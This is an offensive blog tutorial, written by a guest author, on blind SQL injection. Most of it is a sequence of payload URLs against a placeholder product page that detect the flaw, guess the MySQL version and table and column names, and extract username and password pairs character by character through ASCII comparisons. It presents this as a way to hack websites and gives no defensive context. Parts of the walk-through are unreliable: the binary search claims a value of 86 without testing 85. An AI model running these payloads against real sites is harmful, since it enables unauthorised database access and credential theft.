SQL Injection Part 3 - Blind Sql Injection

Add This To Del.icio.us Share on Reddit Add to Technorati Digg This

In my previous articles, i have shown you how we can hack websites using simple SQL injection and Query based basic SQL injection. Today i am going to show you the detailed concept of Blind SQL injection.When the website is vulnerable to sql injection but not showing any data on it's pages we go for blind SQL injection. Blind injection is a little more complicated/time consuming. So before going into Blind sql injection, you must have the knowledge of basic SQL injections. So it is strongly recommended you to read my previous articles before proceeding.

• SOL Injection Part 1
• SOL Injection Part 2

Here is the vulnerable link.

http://vulnerablesite.com/product.php?id=12

When we visit the url we see a product article with a title and content.


Testing For Vulnerability
We test the injection is subject to a blind attack by going to the following link.

http:// vulnerablesite.com/product.php?id=12 and 1=1

we should see the same url and contents, then try going to

http:// vulnerablesite.com/product.php?id=12 and 1=2

on a successful injection you will see content missing on the page. Because 1=2 is always false.

MySQL Version

http:// vulnerablesite.com/product.php?id=12 and substring(@@version,1,1)=4

what i did here was get the first character of @@version and compare it to =4, if its TRUE, the page loads normally. It means the version is 4. If there is any content missing, we change the 4 to  5 and try again, this time the page loads normally with the content there so we know were dealing with Mysql5



Checking For Table Names

http:// vulnerablesite.com/product.php?id=12 and (SELECT 1 from admin limit 0,1)=1

I tried guessing for table admin, if there is a table called admin it will load normally. Just change the table to guess table names. If it gives an error or content missing,then the table doesn’t exist. So try another table name.



Checking For Column Names
If you are lucky and guessed some good table names we now can try guessing some columns within those tables.

http:// vulnerablesite.com/product.php?id=12 and (SELECT substring(concat(1,password),1,1) from users limit 0,1)=1

If the column password exists, then the page loads normally else try another column name.Now let us assume that we got the table name admin and two columns username and password. We have to pull the data from these table/columns.



Pulling Data From Found Table/Columns
This is the actual part that takes lots of time. We use ascii characters in order to pull data since no data will be displayed on the page.

http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100

In the above example,I have set user id = 2 and trying to pull the password.  If the ascii char was greater then 100 the page will load normally. In our case the page doesn't load with the content so we know the first char is less then 100, we guess again.

http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>80

page loads normally with >80, true. We go higher.

http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>90

false, so we go lower.

http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>86

false. We now narrowed it down to be greater then 85 but not greater then 86. So we know our number is 86! You can test by doing =86 if you want to be sure, it may be confusing at first. Using an ascii converter we knows char(86) is 'V', so the first letter of our returned row is 'V'.


To get the next character we modify the sub string.

http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>100

I changed the substring ,1,1 to 2,1. now it returns the 2nd character of the subselect, 1 character in length. we do the same thing again as the first char. This time >100 returned true so we raise the number.

http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>120

false, lower the 120

http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>110

false, lower

http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>105

false,lower

http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>103

true, higher

http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>104

, we see that its greater then 104 and NOT greater then 105 making the number we want 105. char(105) is 'i'. So we have 'Vi' so far. Keep incrementing the substring until you get to the end where >0 will return false.

I am giving you an ascii code chart for better understanding.

Or you can go online for the same chart from the following link.

http://easycalculation.com/ascii-hex.php

Hope you liked this article, feel free to leave your comments for further doubts and clarifications.

About the Guest Author:
This article is written by Mr Srinivas, He owns Hackinginception where he writes articles related to hacking .If your interested in writing a guest post @Hackaholic please contact me

Enjoyed this article?

Subscribe to "Hackaholic"and get daily

updates in your inbox for free!